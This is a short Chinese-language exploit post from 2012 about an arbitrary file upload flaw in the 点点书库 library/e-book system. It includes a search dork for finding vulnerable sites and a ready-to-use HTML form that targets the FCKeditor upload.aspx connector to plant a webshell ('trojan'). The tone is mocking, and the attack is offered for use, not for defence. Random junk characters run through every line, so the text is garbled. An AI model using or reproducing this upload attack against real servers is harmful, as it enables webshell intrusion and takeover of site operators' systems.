主题:图书馆系统任意文件上传漏洞
' @! X: ? r, |6 l+ ` U' \ 作者:冰锋刺客
2 k( x) M K# z- V. [; A 厂商:点击书(dianjishu.com)
m& ?# i" e8 M$ W5 i0 ^9 D: x/ J 日期:2012-6-21
0 G+ M8 o* c. b2 j5 ~. i ; M9 U% L$ ~, E1 U L
I 概述, r$ D7 h1 K5 |4 m! j
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell- O- ?( Q2 {0 K1 y9 r
II 简介1 U+ j5 ^7 o0 \; o6 J2 I4 o$ r3 I
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"$ D6 ?. h, y% b. ]5 j; x/ K' a# Z& a
补充一个漏洞
# `3 g1 U! O/ f# [' T <form id="frmUpload" enctype="multipart/form-data"& s7 \4 K* G2 V( M3 H
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>8 h( W9 z3 Q; k
<input id="btnUpload" type="submit" value="操翻他">
1 h/ C4 [1 I, E6 S- q </form>
5 K. |' q) C X3 P' ]0 F- w 你们懂的; [5 ?- B% g6 W- P4 a- g h: K
那傻逼提供还需要改包.: A; f+ r8 t+ E) T
自己看了下源代码发现fckeditor
?8 Q$ \( _! R o! k 直接秒杀
" v% B- d2 e) q, F$ P |